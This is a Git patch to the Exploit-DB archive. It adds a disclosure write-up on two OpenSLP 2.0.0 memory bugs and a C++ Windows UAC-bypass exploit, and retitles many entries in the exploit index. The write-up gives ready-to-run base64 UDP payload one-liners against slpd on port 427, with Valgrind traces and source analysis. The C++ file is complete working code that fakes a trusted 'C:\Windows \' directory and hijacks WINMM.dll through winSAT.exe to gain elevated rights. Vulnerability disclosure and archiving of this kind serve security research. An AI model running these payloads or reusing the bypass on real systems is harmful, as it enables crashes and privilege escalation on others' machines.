From 925e6e06293399cb7e593a105b000326a2487230 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 10 Nov 2018 05:01:40 +0000
Subject: [PATCH] DB: 2018-11-10

2 changes to exploits/shellcodes

Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)
Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC)
Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation
Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation
Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation
openslp 2.0.0 - Double-Free
OpenSLP 2.0.0 - Double-Free
Windows Speech Recognition - Buffer Overflow (PoC)
Microsoft Windows Speech Recognition - Buffer Overflow (PoC)
Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)
Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011)
Windows Firewall Control - Unquoted Service Path Privilege Escalation
Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation
Windows DVD Maker 6.1.7 - XML External Entity Injection
Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection
Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)
Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)
Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation
Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation
Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation
Windows 10 Diagnostics Hub Standard Collector Service - Privilege Escalation
Microsoft Windows 10 - Diagnostics Hub Standard Collector Service Privilege Escalation
Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) Microsoft Windows - SetImeInfoEx Win32k NULL Pointer Dereference (Metasploit) OpenSLP 2.0.0 - Multiple Vulnerabilities Microsoft Windows 10 (Build 17134) - Local Privilege Escalation (UAC Bypass) --- exploits/linux/local/45804.txt | 264 +++++++++++++++++++++++++++++++ exploits/windows/local/45805.cpp | 37 +++++ files_exploits.csv | 28 ++-- 3 files changed, 316 insertions(+), 13 deletions(-) create mode 100644 exploits/linux/local/45804.txt create mode 100644 exploits/windows/local/45805.cpp diff --git a/exploits/linux/local/45804.txt b/exploits/linux/local/45804.txt new file mode 100644 index 000000000..7cdd89ef1 --- /dev/null +++ b/exploits/linux/local/45804.txt 
@@ -0,0 +1,264 @@ + + _ _ + / | ___ ___ ___ ___ ___| |___ + _ / / | . | . | -_| |_ -| | . | +|_|_/ |___| _|___|_|_|___|_| _| + |_| |_| + +2018-11-07 + +MORE BUGS IN OPENSLP-2.0.0 +========================== + +I discovered some bugs in openslp-2.0.0 back in January, 2018. +One of them I disclosed in June (dumpco.re/blog/openslp-2.0.0-double-free), +and today I'm disclosing two more. + + +BUG 1 +===== + +This issue is an OOB read that does not crash the application. +So in terms of exploitation it is not very interesting. If that's what +you're here for then scroll down to bug#2. +After the occurence of the bug the application actually detects the error +and ignores the malicious packet. Therefore, it could be argued that this +is not a bug at all. Nevertheless, here it is: + +Proof of concept exploit: + + echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d > /dev/udp/127.0.0.1/427 + +Valgrind report: + + ==27968== Invalid read of size 1 + ==27968== at 0x412436: GetUINT16 (slp_message.c:63) + ==27968== by 0x4159C7: v2ParseSrvReg (slp_v2message.c:327) + ==27968== by 0x4159C7: SLPv2MessageParseBuffer (slp_v2message.c:1005) + ==27968== by 0x40BF4A: SLPDProcessMessage (slpd_process.c:1393) + ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) + ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) + ==27968== by 0x40256B: main (slpd_main.c:699) + ==27968== Address 0x5b5c3f1 is 0 bytes after a block of size 81 alloc'd + ==27968== at 0x4C28C20: malloc (vg_replace_malloc.c:296) + ==27968== by 0x40FC1C: SLPBufferAlloc (slp_buffer.c:67) + ==27968== by 0x40FCBA: SLPBufferDup (slp_buffer.c:139) + ==27968== by 0x40BF7F: SLPDProcessMessage (slpd_process.c:1383) + ==27968== by 0x407139: IncomingDatagramRead (slpd_incoming.c:95) + ==27968== by 0x407139: SLPDIncomingHandler (slpd_incoming.c:420) + ==27968== by 0x40256B: main (slpd_main.c:699) + +Analysis: + +v2ParseSrvReg is responsible for parsing incoming requests. 
Various bytes +are read from the packet and interpreted as integers used as length fields. +One of them is the scopelistlen, parsed on line 321, and further used as +argument for the amount of bytes to increment the buffer->curpos pointer +in the the GetStrPtr function, shown below on line 112. It now points to +uninitialized memory. + +The OOB read occurs in GetUINT16, called on line 327 where the buffer->curpos +pointer is dereferenced. + +Subsequently the comparison on line 329 evaluates to true since the +buffer->curpos now points to memory located after the buffer->end +pointer. The application therefore stops processing the malicious packet. + + 291 static int v2ParseSrvReg(SLPBuffer buffer, SLPSrvReg * srvreg) + 292 { + 293 int result; + 294 + 295 /* 0 1 2 3 + 296 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 + 297 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 298 | \ + 299 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 300 | length of service type string | \ + 301 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 302 | length of | \ + 303 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 304 | length of attr-list string | \ + 305 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ + 306 |# of AttrAuths |(if present) Attribute Authentication Blocks...\ + 307 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ + 308 + 309 /* Parse the . */ + 310 result = v2ParseUrlEntry(buffer, &srvreg->urlentry); + 311 if (result != 0) + 312 return result; + 313 + 314 /* Parse the string. */ + 315 srvreg->srvtypelen = GetUINT16(&buffer->curpos); + 316 srvreg->srvtype = GetStrPtr(&buffer->curpos, srvreg->srvtypelen); + 317 if (buffer->curpos > buffer->end) + 318 return SLP_ERROR_PARSE_ERROR; + 319 + 320 /* Parse the string. 
*/ + 321 srvreg->scopelistlen = GetUINT16(&buffer->curpos); + 322 srvreg->scopelist = GetStrPtr(&buffer->curpos, srvreg->scopelistlen); + 323 if (buffer->curpos > buffer->end) + 324 return SLP_ERROR_PARSE_ERROR; + 325 + 326 /* Parse the string. */ + 327 srvreg->attrlistlen = GetUINT16(&buffer->curpos); + 328 srvreg->attrlist = GetStrPtr(&buffer->curpos, srvreg->attrlistlen); + 329 if (buffer->curpos > buffer->end) + 330 return SLP_ERROR_PARSE_ERROR; + + 54 /** Extract a 16-bit big-endian buffer value into a native 16-bit word. + 55 * + 56 * @param[in,out] cpp - The address of a pointer from which to extract. + 57 * + 58 * @return A 16-bit unsigned value in native format; the buffer pointer + 59 * is moved ahead by 2 bytes on return. + 60 */ + 61 uint16_t GetUINT16(uint8_t ** cpp) + 62 { + 63 uint16_t rv = AS_UINT16(*cpp); + 64 *cpp += 2; + 65 return rv; + 66 } + ... + 96 /** Extract a string buffer address into a character pointer. + 97 * + 98 * Note that this routine doesn't actually copy the string. It only casts + 99 * the buffer pointer to a character pointer and moves the value at @p cpp + 100 * ahead by @p len bytes. + 101 * + 102 * @param[in,out] cpp - The address of a pointer from which to extract. + 103 * @param[in] len - The length of the string to extract. + 104 * + 105 * @return A pointer to the first character at the address pointed to by + 106 * @p cppstring pointer; the buffer pointer is moved ahead by @p len bytes + 107 * on return. + 108 */ + 109 char * GetStrPtr(uint8_t ** cpp, size_t len) + 110 { + 111 char * sp = (char *)*cpp; + 112 *cpp += len; + 113 return sp; + 114 } + + +Proof of discovery: + + $ echo -n "AgMAAAAAAAAAAAAAAAAAAPQAATEAAAAAB2VuAAAAF3M=" | base64 -d | sha256sum + 0d3f7a6e45a59def9097db4f103f95e4af2560bdb25853f9ee1c2e758c7d4946 - + +twitter.com/magnusstubman/status/953909628622069760 + + +Patch: + +I'm not aware of any patch, and I'm not sure the maintainers are going to patch it. 
+ +BUG 2 +===== + +First and foremost, I'm not claiming credit for this bug since it was +apparently discovered by Reno Robert and publicly disclosed on the +oss-security mailing list on 2016-09-27 and awarded CVE-2016-7567 +the day after. + +openwall.com/lists/oss-security/2016/09/27/4 +openwall.com/lists/oss-security/2016/09/28/1 + +Anyhow, I wasn't aware of the issue and found it by fuzzing, so I +reported it to the maintainers who made me aware of the earlier discovery. +What puzzled me was that no announcement had been made and the fact that +the latest stable version on their website is still vulnerable! I found it +2017-12-06 and reported it 2018-01-18. See further down for proof of +discovery. + +I havn't been able to find any exploit for this bug anywhere. Therefore, +I'm today disclosing a proof-of-concept exploit for the bug to increase +attention on the issue. + +Exploit: + + echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d > /dev/udp/127.0.0.1/427 + +Valgrind report: + + ==56913== Invalid write of size 1 + ==56913== at 0x4C2D6A3: memcpy@GLIBC_2.2.5 (vg_replace_strmem.c:914) + ==56913== by 0x40FD0B: SLPFoldWhiteSpace (slp_compare.c:210) + ==56913== by 0x4100DC: SLPCompareString (slp_compare.c:374) + ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) + ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) + ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) + ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) + ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) + ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) + ==56913== by 0x402383: main (slpd_main.c:699) + ==56913== Address 0x5b5dd06 is 0 bytes after a block of size 6 
alloc'd + ==56913== at 0x4C28C20: malloc (vg_replace_malloc.c:296) + ==56913== by 0x415C51: _xmemdup (slp_xmalloc.c:356) + ==56913== by 0x410096: SLPCompareString (slp_compare.c:365) + ==56913== by 0x410331: SLPContainsStringList (slp_compare.c:514) + ==56913== by 0x4103C6: SLPIntersectStringList (slp_compare.c:550) + ==56913== by 0x40C606: ProcessSrvTypeRqst (slpd_process.c:1220) + ==56913== by 0x40C606: SLPDProcessMessage (slpd_process.c:1431) + ==56913== by 0x406F69: IncomingDatagramRead (slpd_incoming.c:94) + ==56913== by 0x406F69: SLPDIncomingHandler (slpd_incoming.c:406) + ==56913== by 0x402383: main (slpd_main.c:699) + +The while loop on line 207 fails to perform bounds checking, and as such +may end up incrementing the pointer p up to a point such that p is bigger +than ep. Thus, the third argument to memmove on line 2010 becomes negative. +However, since memmove accepts a size_t (which is unsigned) the value wraps +around and becomes UINT_MAX or close to UINT_MAX resulting in memmove +attempting to move an excessive amount of memory, resulting in OOB write. + + 184 /** fold internal white space within a string. + 185 * + 186 * folds all internal white space to a single space character within a + 187 * specified string. modified the @p str parameter with the result and + 188 * returns the new length of the string. + 189 * + 190 * @param[in] len - the length in bytes of @p str. + 191 * @param[in,out] str - the string from which extraneous white space + 192 * should be removed. + 193 * + 194 * @return the new (shorter) length of @p str. + 195 * + 196 * @note this routine assumes that leading and trailing white space have + 197 * already been removed from @p str. + 198 */ + 199 static int slpfoldwhitespace(size_t len, char * str) + 200 { + 201 char * p = str, * ep = str + len; + 202 while (p < ep) + 203 { + 204 if (isspace(*p)) + 205 { + 206 char * ws2p = ++p; /* point ws2p to the second ws char. */ + 207 while (isspace(*p)) /* scan till we hit a non-ws char. 
*/ + 208 p++; + 209 len -= p - ws2p; /* reduce the length by extra ws. */ + 210 memmove(ws2p, p, ep - p); /* overwrite the extra white space. */ + 211 } + 212 p++; + 213 } + 214 return (int)len; + 215 } + +Proof of discovery: + + $ echo -n "AgkAAA8AAAAAAJuiAAAAAAAAAJtkaXJlYwB/ACssZVJlblxkZQkJCAkJ8wkJCQkJCYAJCQkJCWF0CQlkCQBkLCwsLEUsLCwsLCwsLCwsLCwsLCwsSCwsLCwsLIAsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCysLCwsLCwAAAPoLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCwsLCxcZGUJCQgJCfMJCQkJCQkJCQkJCQlhdAkJZAkAZCwsLCwsLCwsLCwsLA==" | base64 -d | sha256sum + 5bba9f9410bd4dffa4dc119477153002002db3fdd26a97080e43bfd95aeadb24 - + +twitter.com/magnusstubman/status/938317849474555904 + +Patch: sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a + +REFERENCES +========== + +- sourceforge.net/p/openslp/bugs/161 +- sourceforge.net/p/openslp/bugs/160 +- twitter.com/magnusstubman/status/938317849474555904 +- twitter.com/magnusstubman/status/953909628622069760 +- sourceforge.net/p/openslp/mercurial/ci/34fb3aa5e6b4997fa21cb614e480de36da5dbc9a +- openwall.com/lists/oss-security/2016/09/27/4 +- openwall.com/lists/oss-security/2016/09/28/1 \ No newline at end of file diff --git a/exploits/windows/local/45805.cpp b/exploits/windows/local/45805.cpp new file mode 100644 index 000000000..14d0b457f --- /dev/null +++ b/exploits/windows/local/45805.cpp 
@@ -0,0 +1,37 @@ +#include "stdafx.h" +#include +#include "resource.h" + +void DropResource(const wchar_t* rsrcName, const wchar_t* filePath) { + HMODULE hMod = GetModuleHandle(NULL); + HRSRC res = FindResource(hMod, MAKEINTRESOURCE(IDR_DATA1), rsrcName); + DWORD dllSize = SizeofResource(hMod, res); + void* dllBuff = LoadResource(hMod, res); + HANDLE hDll = CreateFile(filePath, GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, NULL); + DWORD sizeOut; + WriteFile(hDll, dllBuff, dllSize, &sizeOut, NULL); + CloseHandle(hDll); +} + +int main() +{ + _SHELLEXECUTEINFOW se = {}; + //Create Mock SystemRoot Directory + CreateDirectoryW(L"\\\\?\\C:\\Windows \\", 0); + CreateDirectoryW(L"\\\\?\\C:\\Windows \\System32", 0); + CopyFileW(L"C:\\Windows\\System32\\winSAT.exe", L"\\\\?\\C:\\Windows \\System32\\winSAT.exe", false); + + //Drop our dll for hijack + DropResource(L"DATA", L"\\\\?\\C:\\Windows \\System32\\WINMM.dll"); + + //Execute our winSAT.exe copy from fake trusted directory + se.cbSize = sizeof(_SHELLEXECUTEINFOW); + se.lpFile = L"C:\\Windows \\System32\\winSAT.exe"; + se.lpParameters = L"formal"; + se.nShow = SW_HIDE; + se.hwnd = NULL; + se.lpDirectory = NULL; + ShellExecuteEx(&se); + + return 0; +} \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 53e302562..4d798b04a 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -5337,7 +5337,7 @@ id,file,description,date,author,type,platform,port 40878,exploits/windows/dos/40878.txt,"Microsoft Edge - CMarkup::Ensure­Delete­CFState Use-After-Free (MS15-125)",2016-12-06,Skylined,dos,windows, 40879,exploits/windows/dos/40879.html,"Microsoft Internet Explorer 9 - CDoc::Execute­Script­Uri Use-After-Free (MS13-009)",2016-12-06,Skylined,dos,windows, 40880,exploits/windows/dos/40880.txt,"Microsoft Edge - CBase­Scriptable::Private­Query­Interface Memory Corruption (MS16-068)",2016-12-06,Skylined,dos,windows, -40883,exploits/windows/dos/40883.py,"Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows, +40883,exploits/windows/dos/40883.py,"Microsoft Windows 10 (x86/x64) - WLAN AutoConfig Denial of Service (PoC)",2016-12-06,"Jeremy Brown",dos,windows, 40885,exploits/windows/dos/40885.py,"Dual DHCP DNS Server 7.29 - Denial of Service",2016-12-07,R-73eN,dos,windows, 40886,exploits/hardware/dos/40886.py,"TP-LINK TD-W8951ND - Denial of Service",2016-12-07,"Persian Hack Team",dos,hardware, 40888,exploits/linux/dos/40888.py,"OpenSSH 7.2 - Denial of Service",2016-12-07,"SecPod Research",dos,linux, 
@@ -6004,8 +6004,8 @@ id,file,description,date,author,type,platform,port 44894,exploits/linux/dos/44894.py,"rtorrent 0.9.6 - Denial of Service",2018-06-14,ecx86,dos,linux, 44908,exploits/linux/dos/44908.txt,"Redis 5.0 - Denial of Service",2018-06-20,"Fakhri Zulkifli",dos,linux, 44909,exploits/linux/dos/44909.txt,"ntp 4.2.8p11 - Local Buffer Overflow (PoC)",2018-06-20,"Fakhri Zulkifli",dos,linux, -44914,exploits/windows/dos/44914.txt,"Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, -44915,exploits/windows/dos/44915.txt,"Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, +44914,exploits/windows/dos/44914.txt,"Microsoft Windows 10 - Desktop Bridge Activation Arbitrary Directory Creation Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, +44915,exploits/windows/dos/44915.txt,"Microsoft Windows 10 - Desktop Bridge Virtual Registry CVE-2018-0880 Incomplete Fix Privilege Escalation",2018-06-20,"Google Security Research",dos,windows, 44925,exploits/linux/dos/44925.txt,"QEMU Guest Agent 2.12.50 - Denial of Service",2018-06-22,"Fakhri Zulkifli",dos,linux, 44927,exploits/php/dos/44927.pl,"Opencart < 3.0.2.0 - Denial of Service",2018-06-22,"Todor Donev",dos,php,80 44934,exploits/hardware/dos/44934.txt,"DIGISOL DG-BR4000NG - Buffer Overflow (PoC)",2018-06-25,"Adipta Basu",dos,hardware, 
@@ -6013,7 +6013,7 @@ id,file,description,date,author,type,platform,port 44962,exploits/linux/dos/44962.txt,"SIPp 3.6 - Local Buffer Overflow (PoC)",2018-07-02,"Fakhri Zulkifli",dos,linux, 44965,exploits/hardware/dos/44965.py,"Delta Industrial Automation COMMGR 1.08 - Stack Buffer Overflow (PoC)",2018-07-02,t4rkd3vilz,dos,hardware,80 45106,exploits/linux/dos/45106.c,"fusermount - user_allow_other Restriction Bypass and SELinux Label Control",2018-07-30,"Google Security Research",dos,linux, -44972,exploits/linux/dos/44972.py,"openslp 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, +44972,exploits/linux/dos/44972.py,"OpenSLP 2.0.0 - Double-Free",2018-07-03,"Magnus Klaaborg Stubman",dos,linux, 44994,exploits/linux/dos/44994.html,"Tor Browser < 0.3.2.10 - Use After Free (PoC)",2018-07-09,t4rkd3vilz,dos,linux, 45011,exploits/windows/dos/45011.js,"Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes",2018-07-12,"Google Security Research",dos,windows, 45012,exploits/windows/dos/45012.js,"Microsoft Edge Chakra JIT - BoundFunction::NewInstance Out-of-Bounds Read",2018-07-12,"Google Security Research",dos,windows, 
@@ -6026,7 +6026,7 @@ id,file,description,date,author,type,platform,port 45061,exploits/multiple/dos/45061.html,"Google Chrome - SwiftShader OpenGL Texture Bindings Reference Count Leak",2018-07-19,"Google Security Research",dos,multiple, 45064,exploits/hardware/dos/45064.txt,"TP-Link TL-WR840N - Denial of Service",2018-07-20,"Aniket Dinda",dos,hardware, 45082,exploits/linux/dos/45082.txt,"Nagios Core 4.4.1 - Denial of Service",2018-07-24,"Fakhri Zulkifli",dos,linux, -45077,exploits/windows/dos/45077.txt,"Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows, +45077,exploits/windows/dos/45077.txt,"Microsoft Windows Speech Recognition - Buffer Overflow (PoC)",2018-07-23,"Nassim Asrir",dos,windows, 45087,exploits/windows/dos/45087.py,"GetGo Download Manager 6.2.1.3200 - Denial of Service (PoC)",2018-07-25,"Nathu Nandwani",dos,windows, 45091,exploits/windows/dos/45091.py,"Core FTP 2.0 - 'XRMD' Denial of Service (PoC)",2018-07-26,"Erik David Martin",dos,windows, 45092,exploits/windows/dos/45092.py,"QNap QVR Client 5.1.1.30070 - 'Password' Denial of Service (PoC)",2018-07-27,"Luis Martínez",dos,windows, 
@@ -6258,7 +6258,7 @@ id,file,description,date,author,type,platform,port 261,exploits/sco/local/261.c,"SCO OpenServer 5.0.5 - Env Local Stack Overflow",2001-01-26,K2,local,sco, 265,exploits/irix/local/265.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/bin/lpstat' Local Overflow / Local Privilege Escalation",2001-05-07,LSD-PLaNET,local,irix, 270,exploits/irix/local/270.sh,"IRIX 5.3/6.2/6.3/6.4/6.5/6.5.11 - '/usr/lib/print/netprint' Local Privilege Escalation",2001-05-08,LSD-PLaNET,local,irix, -271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local SYSTEM (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, +271,exploits/windows/local/271.c,"Microsoft Windows Utility Manager - Local Privilege Escalation (MS04-011)",2004-04-15,"Cesar Cerrudo",local,windows, 272,exploits/windows/local/272.c,"WinZip - MIME Parsing Overflow",2004-04-15,snooq,local,windows, 273,exploits/linux/local/273.c,"SquirrelMail - 'chpasswd' Local Buffer Overflow",2004-04-20,x314,local,linux, 281,exploits/tru64/local/281.c,"Tru64 UNIX 4.0g - '/usr/bin/at' Local Privilege Escalation",2001-03-02,"Cody Tubbs",local,tru64, 
@@ -9489,7 +9489,7 @@ id,file,description,date,author,type,platform,port 40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows, 40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows, 40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows, -40443,exploits/windows/local/40443.txt,"Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, +40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows, 40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux, 40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64, 40460,exploits/windows/local/40460.txt,"Abyss Web Server X1 2.11.1 - Unquoted Service Path Privilege Escalation",2016-10-05,Tulpa,local,windows, 
@@ -9630,7 +9630,7 @@ id,file,description,date,author,type,platform,port 41597,exploits/linux/local/41597.txt,"Oracle VM VirtualBox - Cooperating VMs can Escape from Shared Folder",2017-03-13,"Google Security Research",local,linux, 41605,exploits/windows_x86-64/local/41605.txt,"PCAUSA Rawether (ASUS PCE-AC56 WLAN Card Utilities Windows 10 x64) - Local Privilege Escalation",2017-03-15,ReWolf,local,windows_x86-64, 41607,exploits/windows/local/41607.cs,"Microsoft Windows - COM Session Moniker Privilege Escalation (MS17-012)",2017-03-15,"Google Security Research",local,windows, -41619,exploits/windows/local/41619.txt,"Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, +41619,exploits/windows/local/41619.txt,"Microsoft Windows DVD Maker 6.1.7 - XML External Entity Injection",2017-03-16,hyp3rlinx,local,windows, 43359,exploits/linux/local/43359.c,"Firejail < 0.9.44.4 / < 0.9.38.8 LTS - Local Sandbox Escape",2017-01-04,"Sebastian Krahmer",local,linux, 43366,exploits/windows/local/43366.md,"TeamViewer 11 < 13 (Windows 10 x86) - Inline Hooking / Direct Memory Modification Permission Change",2017-12-04,gellin,local,windows, 43390,exploits/windows/local/43390.txt,"Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation",2017-12-26,"Julien Ahrens",local,windows, 
@@ -9734,7 +9734,7 @@ id,file,description,date,author,type,platform,port 42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows, 42121,exploits/windows/local/42121.txt,"BIND 9.10.5 - Unquoted Service Path Privilege Escalation",2017-06-05,hyp3rlinx,local,windows, 42141,exploits/windows/local/42141.txt,"Net Monitor for Employees Pro < 5.3.4 - Unquoted Service Path Privilege Escalation",2017-06-08,"Saeid Atabaki",local,windows, -42142,exploits/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows, +42142,exploits/windows/local/42142.rb,"Microsoft Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,local,windows, 42145,exploits/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",local,multiple, 42146,exploits/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,local,macos, 42157,exploits/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,local,windows, 
@@ -9824,7 +9824,7 @@ id,file,description,date,author,type,platform,port 43162,exploits/windows/local/43162.txt,"Microsoft Windows 10 - CiSetFileCache TOCTOU Security Feature Bypass",2017-11-20,"Google Security Research",local,windows, 43179,exploits/windows/local/43179.py,"ALLPlayer 7.5 - Local Buffer Overflow (SEH Unicode)",2017-11-25,sickness,local,windows, 43187,exploits/windows/local/43187.txt,"Diving Log 6.0 - XML External Entity Injection",2017-11-27,"Trent Gordon",local,windows, -43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 Creators Update (version 1703) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86, +43192,exploits/windows_x86/local/43192.c,"Microsoft Windows 10 (Build 1703 Creators Update) (x86) - 'WARBIRD' 'NtQuerySystemInformation ' Kernel Local Privilege Escalation",2017-11-27,XPN,local,windows_x86, 43201,exploits/macos/local/43201.rb,"Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation (Metasploit)",2017-11-30,Metasploit,local,macos, 43216,exploits/macos/local/43216.rb,"Arq 5.9.7 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, 43217,exploits/macos/local/43217.sh,"Murus 1.4.11 - Local Privilege Escalation",2017-12-06,"Mark Wadham",local,macos, 
@@ -9907,7 +9907,7 @@ id,file,description,date,author,type,platform,port 44475,exploits/windows/local/44475.txt,"Brave Browser < 0.13.0 - 'window.close(self)' Denial of Service",2018-04-17,"Sahil Tikoo",local,windows, 44476,exploits/windows/local/44476.py,"AMD Plays.tv 1.27.5.0 - 'plays_service.exe' Arbitrary File Execution",2018-04-15,Securifera,local,windows, 44477,exploits/windows/local/44477.py,"Reaper 5.78 - Local Buffer Overflow",2018-04-17,bzyo,local,windows, -44478,exploits/windows_x86/local/44478.cpp,"Microsoft Window Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, +44478,exploits/windows_x86/local/44478.cpp,"Microsoft Windows Manager (Windows 7 x86) - Menu Management Component UAF Privilege Elevation",2018-03-26,xiaodaozhi,local,windows_x86, 44479,exploits/windows_x86/local/44479.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS17-017)",2018-03-15,xiaodaozhi,local,windows_x86, 44480,exploits/windows_x86/local/44480.cpp,"Microsoft Windows Kernel (Windows 7 x86) - Local Privilege Escalation (MS16-039)",2018-03-01,xiaodaozhi,local,windows_x86, 44499,exploits/windows_x86/local/44499.py,"Free Download Manager 2.0 Built 417 - Local Buffer Overflow (SEH)",2018-04-23,"Marwan Shamel",local,windows_x86, 
